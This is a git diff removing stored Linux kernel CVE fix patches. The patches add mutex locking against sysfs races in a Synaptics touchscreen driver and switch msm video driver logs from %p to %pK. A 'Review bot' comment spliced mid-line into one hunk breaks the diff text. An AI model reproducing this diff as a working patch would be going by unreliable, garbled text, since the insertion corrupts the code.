mutex_unlock(&fwu_sysfs_mutex); - return retval; - } - -@@ -3860,35 +3890,42 @@ static ssize_t fwu_sysfs_write_config_store(struct device *dev, - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto write_config_store_exit; - } - - if (input != 1) { - retval = -EINVAL; -- goto exit; -+ goto 
write_config_store_exit; - } - -- if (!fwu->ext_data_source) -- return -EINVAL; -- else -+ if (!fwu->ext_data_source) { -+ retval = -EINVAL; -+ goto write_config_store_exit; -+ } else { - fwu->image = fwu->ext_data_source; -+ } - - retval = fwu_start_write_config(); - if (retval < 0) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to write config\n", - __func__); -- goto exit; -+ goto write_config_store_free_exit; - } - - retval = count; - --exit: -+write_config_store_free_exit: - kfree(fwu->ext_data_source); - fwu->ext_data_source = NULL; - fwu->image = NULL; -+write_config_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return retval; - } - -@@ -3905,7 +3942,11 @@ static ssize_t fwu_sysfs_read_config_store(struct device *dev, - if (input != 1) - return -EINVAL; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - retval = fwu_do_read_config(); -+ mutex_unlock(&fwu_sysfs_mutex); -+ - if (retval < 0) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to read config\n", -@@ -3926,7 +3967,10 @@ static ssize_t fwu_sysfs_config_area_store(struct device *dev, - if (retval) - return retval; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - fwu->config_area = config_area; -+ mutex_unlock(&fwu_sysfs_mutex); - - return count; - } -@@ -3937,8 +3981,12 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev, - int retval; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - retval = secure_memcpy(fwu->image_name, MAX_IMAGE_NAME_LEN, - buf, count, count); -+ mutex_unlock(&fwu_sysfs_mutex); -+ - if (retval < 0) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to copy image file name\n", -@@ -3952,7 +4000,7 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev, - static ssize_t fwu_sysfs_image_size_store(struct device *dev, - struct device_attribute *attr, const char *buf, size_t count) - { -- int retval; -+ ssize_t retval; - unsigned long size; - struct 
synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -@@ -3960,6 +4008,9 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev, - if (retval) - return retval; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - fwu->image_size = size; - fwu->data_pos = 0; - -@@ -3969,10 +4020,12 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev, - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to alloc mem for image data\n", - __func__); -- return -ENOMEM; -+ retval = -ENOMEM; -+ } else { -+ retval = count; - } -- -- return count; -+ mutex_unlock(&fwu_sysfs_mutex); -+ return retval; - } - - static ssize_t fwu_sysfs_block_size_show(struct device *dev, -@@ -4024,35 +4077,42 @@ static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev, - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto guest_code_store_exit; - } - - if (input != 1) { - retval = -EINVAL; -- goto exit; -+ goto guest_code_store_exit; - } - -- if (!fwu->ext_data_source) -- return -EINVAL; -- else -+ if (!fwu->ext_data_source) { -+ retval = -EINVAL; -+ goto guest_code_store_exit; -+ } else { - fwu->image = fwu->ext_data_source; -+ } - - retval = fwu_start_write_guest_code(); - if (retval < 0) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to write guest code\n", - __func__); -- goto exit; -+ goto guest_code_store_free_exit; - } - - retval = count; - --exit: -+guest_code_store_free_exit: - kfree(fwu->ext_data_source); - fwu->ext_data_source = NULL; - fwu->image = NULL; -+guest_code_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return retval; - } - diff --git a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0005.patch b/Patches/Linux_CVEs/CVE-2016-6745/ANY/0005.patch deleted file mode 100644 index b8e553b4..00000000 --- a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0005.patch +++ /dev/null 
@@ -1,401 +0,0 @@ -From f5c96a8c96615490b72357b1c0940196f7dde474 Mon Sep 17 00:00:00 2001 -From: Andrew Chant -Date: Wed, 14 Sep 2016 14:12:13 -0700 -Subject: [PATCH] input: touchscreen: Synaptics: prevent sysfs races - -Concurrent sysfs calls can cause ugly race conditions. -Return EBUSY on concurrent sysfs calls, and prevent sysfs calls -during initial fw load. - -Change-Id: Iec3db7f3fe9d33104319fd3e2bbf1d70ba68221b -Bug: 31252388 -Signed-off-by: Andrew Chant ---- - .../synaptics_dsx_fw_update.c | 133 +++++++++++++++------ - 1 file changed, 99 insertions(+), 34 deletions(-) - -diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c -index 3887f79a97a08..af6f92553aa7e 100644 ---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c -+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c -@@ -35,6 +35,7 @@ - #include - #include - #include -+#include - #include - #include - #include -@@ -768,6 +769,8 @@ static struct device_attribute attrs[] = { - static struct synaptics_rmi4_fwu_handle *fwu; - - DECLARE_COMPLETION(fwu_remove_complete); -+DEFINE_MUTEX(fwu_sysfs_mutex); -+ - #ifdef HTC_FEATURE - static uint32_t syn_crc(uint16_t *data, uint32_t len) - { -@@ -5087,6 +5090,9 @@ static void fwu_startup_fw_update_work(struct work_struct *work) - } - #endif - -+ /* Prevent sysfs operations during initial update. 
*/ -+ mutex_lock(&fwu_sysfs_mutex); -+ - #ifdef HTC_FEATURE - wake_lock(&fwu->fwu_wake_lock); - if (bdata->update_feature & SYNAPTICS_RMI4_UPDATE_IMAGE) -@@ -5101,7 +5107,7 @@ static void fwu_startup_fw_update_work(struct work_struct *work) - #else - synaptics_fw_updater(NULL); - #endif -- -+ mutex_unlock(&fwu_sysfs_mutex); - return; - } - #endif -@@ -5113,11 +5119,15 @@ static ssize_t fwu_sysfs_show_image(struct file *data_file, - int retval; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (count < fwu->config_size) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Not enough space (%d bytes) in buffer\n", - __func__, (unsigned int)count); -- return -EINVAL; -+ retval = -EINVAL; -+ goto show_image_exit; - } - - retval = secure_memcpy(buf, count, fwu->read_config_buf, -@@ -5126,10 +5136,14 @@ static ssize_t fwu_sysfs_show_image(struct file *data_file, - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to copy config data\n", - __func__); -- return retval; -+ goto show_image_exit; - } - -- return fwu->config_size; -+ retval = fwu->config_size; -+ -+show_image_exit: -+ mutex_unlock(&fwu_sysfs_mutex); -+ return retval; - } - - static ssize_t fwu_sysfs_store_image(struct file *data_file, -@@ -5139,18 +5153,24 @@ static ssize_t fwu_sysfs_store_image(struct file *data_file, - int retval; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - retval = secure_memcpy(&fwu->ext_data_source[fwu->data_pos], - fwu->image_size - fwu->data_pos, buf, count, count); - if (retval < 0) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to copy image data\n", - __func__); -- return retval; -+ goto store_image_exit; - } - - fwu->data_pos += count; -+ retval = count; - -- return count; -+store_image_exit: -+ mutex_unlock(&fwu_sysfs_mutex); -+ return retval; - } - - static ssize_t fwu_sysfs_do_recovery_store(struct device *dev, -@@ 
-5160,9 +5180,12 @@ static ssize_t fwu_sysfs_do_recovery_store(struct device *dev, - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto do_recovery_store_exit; - } - - if (!fwu->in_ub_mode) { -@@ -5170,11 +5193,13 @@ static ssize_t fwu_sysfs_do_recovery_store(struct device *dev, - "%s: Not in microbootloader mode\n", - __func__); - retval = -EINVAL; -- goto exit; -+ goto do_recovery_store_exit; - } - -- if (!fwu->ext_data_source) -- return -EINVAL; -+ if (!fwu->ext_data_source) { -+ retval = -EINVAL; -+ goto do_recovery_store_exit; -+ } - else - fwu->image = fwu->ext_data_source; - -@@ -5183,15 +5208,18 @@ static ssize_t fwu_sysfs_do_recovery_store(struct device *dev, - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to do recovery\n", - __func__); -- goto exit; -+ goto free_data_source_recovery_exit; - } - - retval = count; - --exit: -+free_data_source_recovery_exit: - kfree(fwu->ext_data_source); - fwu->ext_data_source = NULL; - fwu->image = NULL; -+ -+do_recovery_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return retval; - } - -@@ -5201,9 +5229,13 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev, - int retval; - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; -+ -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto reflash_store_exit; - } - - if (fwu->in_ub_mode) { -@@ -5211,7 +5243,7 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev, - "%s: In microbootloader mode\n", - __func__); - retval = -EINVAL; -- goto exit; -+ goto reflash_store_exit; - } - - //if (!fwu->ext_data_source) -@@ -5226,7 +5258,7 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev, - - if ((input != NORMAL) && (input != FORCE)) { - retval = -EINVAL; -- goto 
exit; -+ goto reflash_store_exit; - } - - if (input == FORCE) -@@ -5237,12 +5269,12 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev, - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to do reflash\n", - __func__); -- goto exit; -+ goto reflash_store_free_exit; - } - - retval = count; - --exit: -+reflash_store_free_exit: - if (fwu->ext_data_source != NULL) { - kfree(fwu->ext_data_source); - fwu->ext_data_source = NULL; -@@ -5250,6 +5282,9 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev, - fwu->image = NULL; - fwu->force_update = FORCE_UPDATE; - fwu->do_lockdown = DO_LOCKDOWN; -+ -+reflash_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return retval; - } - -@@ -5260,14 +5295,17 @@ static ssize_t fwu_sysfs_write_config_store(struct device *dev, - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto write_config_store_exit; - } - - if (input != 1) { - retval = -EINVAL; -- goto exit; -+ goto write_config_store_exit; - } - - if (fwu->in_ub_mode) { -@@ -5275,28 +5313,32 @@ static ssize_t fwu_sysfs_write_config_store(struct device *dev, - "%s: In microbootloader mode\n", - __func__); - retval = -EINVAL; -- goto exit; -+ goto write_config_store_exit; - } - -- if (!fwu->ext_data_source) -- return -EINVAL; -- else -+ if (!fwu->ext_data_source) { -+ retval = -EINVAL; -+ goto write_config_store_exit; -+ } else { - fwu->image = fwu->ext_data_source; -- -+ } - retval = fwu_start_write_config(); - if (retval < 0) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to write config\n", - __func__); -- goto exit; -+ goto write_config_store_free_exit; - } - - retval = count; - --exit: -+write_config_store_free_exit: - kfree(fwu->ext_data_source); - fwu->ext_data_source = NULL; - fwu->image = NULL; -+ -+write_config_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return retval; 
- } - -@@ -5320,7 +5362,11 @@ static ssize_t fwu_sysfs_read_config_store(struct device *dev, - return -EINVAL; - } - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - retval = fwu_do_read_config(); -+ mutex_unlock(&fwu_sysfs_mutex); -+ - if (retval < 0) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to read config\n", -@@ -5341,7 +5387,10 @@ static ssize_t fwu_sysfs_config_area_store(struct device *dev, - if (retval) - return retval; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - fwu->config_area = config_area; -+ mutex_unlock(&fwu_sysfs_mutex); - - return count; - } -@@ -5352,8 +5401,12 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev, - int retval; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - retval = secure_memcpy(fwu->image_name, MAX_IMAGE_NAME_LEN, - buf, count, count); -+ mutex_unlock(&fwu_sysfs_mutex); -+ - if (retval < 0) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to copy image file name\n", -@@ -5375,6 +5428,9 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev, - if (retval) - return retval; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - fwu->image_size = size; - fwu->data_pos = 0; - -@@ -5382,6 +5438,8 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev, - kfree(fwu->ext_data_source); - } - fwu->ext_data_source = kzalloc(fwu->image_size, GFP_KERNEL); -+ mutex_unlock(&fwu_sysfs_mutex); -+ - if (!fwu->ext_data_source) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to alloc mem for image data\n", -@@ -5441,14 +5499,17 @@ static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev, - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto write_guest_code_store_exit; - } - - if (input != 1) { - retval 
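Review bot: In the `fwu_sysfs_image_size_store` hunk, `mutex_unlock(&fwu_sysfs_mutex)` is added before the existing `if (!fwu->ext_data_source)` check, so the allocation result is read from the shared `fwu` after the lock is released. Another sysfs writer that acquires the mutex in that window can replace or free the buffer, and the check would then describe someone else's state. Decide the outcome while the lock is still held, for example `retval = fwu->ext_data_source ? count : -ENOMEM;` placed before the unlock, with the error message and return driven by `retval`. The 0004.patch version of this function keeps the check inside the locked region. The function continues past the end of this hunk, so its final return is not visible here.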
= -EINVAL; -- goto exit; -+ goto write_guest_code_store_exit; - } - - if (fwu->in_ub_mode) { -@@ -5456,28 +5517,32 @@ static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev, - "%s: In microbootloader mode\n", - __func__); - retval = -EINVAL; -- goto exit; -+ goto write_guest_code_store_exit; - } - -- if (!fwu->ext_data_source) -- return -EINVAL; -- else -+ if (!fwu->ext_data_source) { -+ retval = -EINVAL; -+ goto write_guest_code_store_exit; -+ } else { - fwu->image = fwu->ext_data_source; -+ } - - retval = fwu_start_write_guest_code(); - if (retval < 0) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to write guest code\n", - __func__); -- goto exit; -+ goto write_guest_code_store_free_exit; - } - - retval = count; - --exit: -+write_guest_code_store_free_exit: - kfree(fwu->ext_data_source); - fwu->ext_data_source = NULL; - fwu->image = NULL; -+write_guest_code_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return retval; - } - diff --git a/Patches/Linux_CVEs/CVE-2016-6748/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6748/3.10/0001.patch deleted file mode 100644 index 8e6449ea..00000000 --- a/Patches/Linux_CVEs/CVE-2016-6748/3.10/0001.patch +++ /dev/null 
@@ -1,2158 +0,0 @@ -From be651d020b122a1ba9410d23ca4ebbe9f5598df6 Mon Sep 17 00:00:00 2001 -From: Sanjay Singh -Date: Wed, 10 Aug 2016 12:40:58 +0530 -Subject: msm: vidc: use %pK instead of %p which respects kptr_restrict sysctl - -Hide kernel pointers from unprivileged ussers by using %pK format- -specifier instead of %p. This respects the kptr_restrict sysctl -setting which is by default on. So by default %pK will print zeroes -as address. echo 1 to kptr_restrict to print proper kernel addresses. - -CRs-Fixed: 987018 -Change-Id: I4772257a557c6730ecc0624cbc8e5614e893e9fd -Signed-off-by: Sanjay Singh ---- - .../media/platform/msm/vidc/hfi_packetization.c | 8 +- - .../media/platform/msm/vidc/hfi_response_handler.c | 48 +++---- - drivers/media/platform/msm/vidc/msm_smem.c | 20 +-- - drivers/media/platform/msm/vidc/msm_v4l2_vidc.c | 6 +- - drivers/media/platform/msm/vidc/msm_vdec.c | 40 +++--- - drivers/media/platform/msm/vidc/msm_venc.c | 32 ++--- - drivers/media/platform/msm/vidc/msm_vidc.c | 36 +++--- - drivers/media/platform/msm/vidc/msm_vidc_common.c | 138 ++++++++++----------- - drivers/media/platform/msm/vidc/msm_vidc_dcvs.c | 14 +-- - drivers/media/platform/msm/vidc/msm_vidc_debug.c | 18 +-- - drivers/media/platform/msm/vidc/q6_hfi.c | 22 ++-- - drivers/media/platform/msm/vidc/venus_hfi.c | 96 +++++++------- - drivers/media/platform/msm/vidc/vidc_hfi.c | 4 +- - drivers/media/platform/msm/vidc/vmem/vmem.c | 6 +- - 14 files changed, 244 insertions(+), 244 deletions(-) - -diff --git a/drivers/media/platform/msm/vidc/hfi_packetization.c b/drivers/media/platform/msm/vidc/hfi_packetization.c -index 06ac913..86239e2 100644 ---- a/drivers/media/platform/msm/vidc/hfi_packetization.c -+++ b/drivers/media/platform/msm/vidc/hfi_packetization.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. 
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -1402,7 +1402,7 @@ int create_pkt_cmd_session_set_property(
- break;
- default:
- dprintk(VIDC_ERR,
-- "Invalid Rate control setting: 0x%p\n",
-+ "Invalid Rate control setting: 0x%pK\n",
- pdata);
- break;
- }
-@@ -2084,7 +2084,7 @@ int create_pkt_ssr_cmd(enum hal_ssr_trigger_type type,
- struct hfi_cmd_sys_test_ssr_packet *pkt)
- {
- if (!pkt) {
-- dprintk(VIDC_ERR, "Invalid params, device: %p\n", pkt);
-+ dprintk(VIDC_ERR, "Invalid params, device: %pK\n", pkt);
- return -EINVAL;
- }
- pkt->size = sizeof(struct hfi_cmd_sys_test_ssr_packet);
-@@ -2097,7 +2097,7 @@ int create_pkt_cmd_sys_image_version(
- struct hfi_cmd_sys_get_property_packet *pkt)
- {
- if (!pkt) {
-- dprintk(VIDC_ERR, "%s invalid param :%p\n", __func__, pkt);
-+ dprintk(VIDC_ERR, "%s invalid param :%pK\n", __func__, pkt);
- return -EINVAL;
- }
- pkt->size = sizeof(struct hfi_cmd_sys_get_property_packet);
-diff --git a/drivers/media/platform/msm/vidc/hfi_response_handler.c b/drivers/media/platform/msm/vidc/hfi_response_handler.c
-index e148f04..c315b6d 100644
---- a/drivers/media/platform/msm/vidc/hfi_response_handler.c
-+++ b/drivers/media/platform/msm/vidc/hfi_response_handler.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -255,7 +255,7 @@ static void hfi_process_event_notify(msm_vidc_callback callback, u32 device_id,
- hfi_process_sys_error(callback, device_id);
- break;
- case HFI_EVENT_SESSION_PROPERTY_CHANGED:
-- dprintk(VIDC_INFO, "HFI_EVENT_SESSION_PROPERTY_CHANGED[%p]\n",
-+ dprintk(VIDC_INFO, "HFI_EVENT_SESSION_PROPERTY_CHANGED[%pK]\n",
- session);
- break;
- }
-@@ -267,24 +267,24 @@ static void hfi_process_event_notify(msm_vidc_callback callback, u32 device_id,
-
- switch (pkt->event_id) {
- case HFI_EVENT_SESSION_ERROR:
-- dprintk(VIDC_INFO, "HFI_EVENT_SESSION_ERROR[%p]\n", session);
-+ dprintk(VIDC_INFO, "HFI_EVENT_SESSION_ERROR[%pK]\n", session);
- hfi_process_session_error(callback, device_id, session, pkt);
- break;
- case HFI_EVENT_SESSION_SEQUENCE_CHANGED:
-- dprintk(VIDC_INFO, "HFI_EVENT_SESSION_SEQUENCE_CHANGED[%p]\n",
-+ dprintk(VIDC_INFO, "HFI_EVENT_SESSION_SEQUENCE_CHANGED[%pK]\n",
- session);
- hfi_process_sess_evt_seq_changed(callback, device_id,
- session, pkt);
- break;
- case HFI_EVENT_RELEASE_BUFFER_REFERENCE:
-- dprintk(VIDC_INFO, "HFI_EVENT_RELEASE_BUFFER_REFERENCE[%p]\n",
-+ dprintk(VIDC_INFO, "HFI_EVENT_RELEASE_BUFFER_REFERENCE[%pK]\n",
- session);
- hfi_process_evt_release_buffer_ref(callback, device_id,
- session, pkt);
- break;
- default:
- dprintk(VIDC_WARN,
-- "hal_process_event_notify: unknown_event_id[%p]\n",
-+ "hal_process_event_notify: unknown_event_id[%pK]\n",
- session);
- break;
- }
-@@ -887,7 +887,7 @@ static enum vidc_status hfi_parse_init_done_properties(
- }
- default:
- dprintk(VIDC_DBG,
-- "%s: default case - data_ptr %p, prop_id 0x%x\n",
-+ "%s: default case - data_ptr %pK, prop_id 0x%x\n",
- __func__, data_ptr, prop_id);
- break;
- }
-@@ -925,7 +925,7 @@ enum vidc_status hfi_process_sys_init_done_prop_read(
- data_ptr = (u8 *) &pkt->rg_property_data[0];
- num_properties = pkt->num_properties;
- dprintk(VIDC_DBG,
-- "%s: data_start %p, num_properties %#x\n",
-+ "%s: data_start %pK, num_properties %#x\n",
- __func__, data_ptr, num_properties);
-
- bytes_read = hfi_fill_codec_info(data_ptr, sys_init_done);
-@@ -955,7 +955,7 @@ static void hfi_process_sess_get_prop_profile_level(
- dprintk(VIDC_DBG, "Entered %s\n", __func__);
- if (!prop) {
- dprintk(VIDC_ERR,
-- "hal_process_sess_get_profile_level: bad_prop: %p\n",
-+ "hal_process_sess_get_profile_level: bad_prop: %pK\n",
- prop);
- return;
- }
-@@ -986,7 +986,7 @@ static void hfi_process_sess_get_prop_buf_req(
-
- if (!prop) {
- dprintk(VIDC_ERR,
-- "hal_process_sess_get_prop_buf_req: bad_prop: %p\n",
-+ "hal_process_sess_get_prop_buf_req: bad_prop: %pK\n",
- prop);
- return;
- }
-@@ -1105,7 +1105,7 @@ static void hfi_process_session_prop_info(msm_vidc_callback callback,
- struct buffer_requirements buff_req;
-
- memset(&buff_req, 0, sizeof(struct buffer_requirements));
-- dprintk(VIDC_DBG, "Received SESSION_PROPERTY_INFO[%p]\n", session);
-+ dprintk(VIDC_DBG, "Received SESSION_PROPERTY_INFO[%pK]\n", session);
-
- if (pkt->size < sizeof(struct hfi_msg_session_property_info_packet)) {
- dprintk(VIDC_ERR,
-@@ -1161,7 +1161,7 @@ static void hfi_process_session_init_done(
-
- memset(&session_init_done, 0, sizeof(struct
- vidc_hal_session_init_done));
-- dprintk(VIDC_DBG, "RECEIVED: SESSION_INIT_DONE[%p]\n", session);
-+ dprintk(VIDC_DBG, "RECEIVED: SESSION_INIT_DONE[%pK]\n", session);
-
- if (sizeof(struct hfi_msg_sys_session_init_done_packet)
- > pkt->size) {
-@@ -1181,7 +1181,7 @@ static void hfi_process_session_init_done(
- pkt, &session_init_done);
- } else {
- dprintk(VIDC_WARN,
-- "Sess init failed: 0x%p, 0x%p\n",
-+ "Sess init failed: 0x%pK, 0x%pK\n",
- session->session_id, session);
- }
- cmd_done.size = sizeof(struct vidc_hal_session_init_done);
-@@ -1193,7 +1193,7 @@ static void hfi_process_session_load_res_done(msm_vidc_callback callback,
- struct hfi_msg_session_load_resources_done_packet *pkt)
- {
- struct msm_vidc_cb_cmd_done cmd_done = {0};
-- dprintk(VIDC_DBG, "RECEIVED: SESSION_LOAD_RESOURCES_DONE[%p]\n",
-+ dprintk(VIDC_DBG, "RECEIVED: SESSION_LOAD_RESOURCES_DONE[%pK]\n",
- session);
-
- if (sizeof(struct hfi_msg_session_load_resources_done_packet) !=
-@@ -1218,7 +1218,7 @@ static void hfi_process_session_flush_done(msm_vidc_callback callback,
- {
- struct msm_vidc_cb_cmd_done cmd_done = {0};
-
-- dprintk(VIDC_DBG, "RECEIVED: SESSION_FLUSH_DONE[%p]\n", session);
-+ dprintk(VIDC_DBG, "RECEIVED: SESSION_FLUSH_DONE[%pK]\n", session);
-
- if (sizeof(struct hfi_msg_session_flush_done_packet) != pkt->size) {
- dprintk(VIDC_ERR,
-@@ -1241,7 +1241,7 @@ static void hfi_process_session_etb_done(msm_vidc_callback callback,
- {
- struct msm_vidc_cb_data_done data_done = {0};
-
-- dprintk(VIDC_DBG, "RECEIVED: SESSION_ETB_DONE[%p]\n", session);
-+ dprintk(VIDC_DBG, "RECEIVED: SESSION_ETB_DONE[%pK]\n", session);
-
- if (!pkt || pkt->size <
- sizeof(struct hfi_msg_session_empty_buffer_done_packet)) {
-@@ -1282,7 +1282,7 @@ static void hfi_process_session_ftb_done(msm_vidc_callback callback,
- return;
- }
-
-- dprintk(VIDC_DBG, "RECEIVED: SESSION_FTB_DONE[%p]\n", session);
-+ dprintk(VIDC_DBG, "RECEIVED: SESSION_FTB_DONE[%pK]\n", session);
-
- if (is_decoder == 0) {
- struct hfi_msg_session_fill_buffer_done_compressed_packet *pkt =
-@@ -1382,7 +1382,7 @@ static void hfi_process_session_start_done(msm_vidc_callback callback,
- {
- struct msm_vidc_cb_cmd_done cmd_done = {0};
-
-- dprintk(VIDC_DBG, "RECEIVED: SESSION_START_DONE[%p]\n", session);
-+ dprintk(VIDC_DBG, "RECEIVED: SESSION_START_DONE[%pK]\n", session);
-
- if (!pkt || pkt->size !=
- sizeof(struct hfi_msg_session_start_done_packet)) {
-@@ -1405,7 +1405,7 @@ static void hfi_process_session_stop_done(msm_vidc_callback callback,
- {
- struct msm_vidc_cb_cmd_done cmd_done = {0};
-
-- dprintk(VIDC_DBG, "RECEIVED: SESSION_STOP_DONE[%p]\n", session);
-+ dprintk(VIDC_DBG, "RECEIVED: SESSION_STOP_DONE[%pK]\n", session);
-
- if (!pkt || pkt->size !=
- sizeof(struct hfi_msg_session_stop_done_packet)) {
-@@ -1428,7 +1428,7 @@ static void hfi_process_session_rel_res_done(msm_vidc_callback callback,
- {
- struct msm_vidc_cb_cmd_done cmd_done = {0};
-
-- dprintk(VIDC_DBG, "RECEIVED: SESSION_RELEASE_RESOURCES_DONE[%p]\n",
-+ dprintk(VIDC_DBG, "RECEIVED: SESSION_RELEASE_RESOURCES_DONE[%pK]\n",
- session);
-
- if (!pkt || pkt->size !=
-@@ -1459,7 +1459,7 @@ static void hfi_process_session_rel_buf_done(msm_vidc_callback callback,
- pkt ? pkt->size : 0);
- return;
- }
-- dprintk(VIDC_DBG, "RECEIVED:SESSION_RELEASE_BUFFER_DONE[%p]\n",
-+ dprintk(VIDC_DBG, "RECEIVED:SESSION_RELEASE_BUFFER_DONE[%pK]\n",
- session);
-
- cmd_done.device_id = device_id;
-@@ -1481,7 +1481,7 @@ static void hfi_process_session_end_done(msm_vidc_callback callback,
- {
- struct msm_vidc_cb_cmd_done cmd_done = {0};
-
-- dprintk(VIDC_DBG, "RECEIVED: SESSION_END_DONE[%p]\n", session);
-+ dprintk(VIDC_DBG, "RECEIVED: SESSION_END_DONE[%pK]\n", session);
-
- if (!pkt || pkt->size !=
- sizeof(struct hfi_msg_sys_session_end_done_packet)) {
-@@ -1503,7 +1503,7 @@ static void hfi_process_session_abort_done(msm_vidc_callback callback,
- {
- struct msm_vidc_cb_cmd_done cmd_done = {0};
-
-- dprintk(VIDC_DBG, "RECEIVED: SESSION_ABORT_DONE[%p]\n", session);
-+ dprintk(VIDC_DBG, "RECEIVED: SESSION_ABORT_DONE[%pK]\n", session);
-
- if (!pkt || pkt->size !=
- sizeof(struct hfi_msg_sys_session_abort_done_packet)) {
-@@ -1540,7 +1540,7 @@ static void hfi_process_session_get_seq_hdr_done(msm_vidc_callback callback,
- __func__);
- return;
- }
-- dprintk(VIDC_DBG, "RECEIVED:SESSION_GET_SEQ_HDR_DONE[%p]\n", session);
-+ dprintk(VIDC_DBG, "RECEIVED:SESSION_GET_SEQ_HDR_DONE[%pK]\n", session);
-
- data_done.device_id = device_id;
- data_done.size = sizeof(struct msm_vidc_cb_data_done);
-diff --git a/drivers/media/platform/msm/vidc/msm_smem.c b/drivers/media/platform/msm/vidc/msm_smem.c
-index 47d3ca5..8ab44a1 100644
---- a/drivers/media/platform/msm/vidc/msm_smem.c
-+++ b/drivers/media/platform/msm/vidc/msm_smem.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
